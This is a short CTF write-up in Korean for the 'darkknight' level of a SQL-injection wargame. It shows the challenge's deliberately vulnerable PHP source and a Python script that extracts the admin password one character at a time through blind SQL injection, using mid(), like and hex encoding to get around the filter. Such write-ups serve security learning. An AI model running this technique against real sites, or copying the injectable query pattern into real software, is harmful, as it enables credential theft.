Darkknight-writeup

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
  if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe"); 
  $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); 
  highlight_file(__FILE__); 
?>

 

import re
import requests
import time

flag = ''
length= 0
session =dict(PHPSESSID="자신의 PHPSESSION")
for i in range (1,20):
        for j in range(48,128):
                        r=requests.post("https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?no=11%20or%20id%20like%200x61646d696e%20and%20mid(pw,"+str(i)+",1) like "+chr(j)+"",cookies=session)
                        print(chr(j))
                        if 'Hello admin' in r.text:
                                flag=flag+str(chr(j))
                                print("finding pw: "+flag)
                                break
print("pw "+flag)


                
이번에도 blind sql injection인데 mid,like를 사용하고 그 전엔 id=guest이라는 구문이 있으므로

id like 'admin'을 넣고 쿼리를 날린다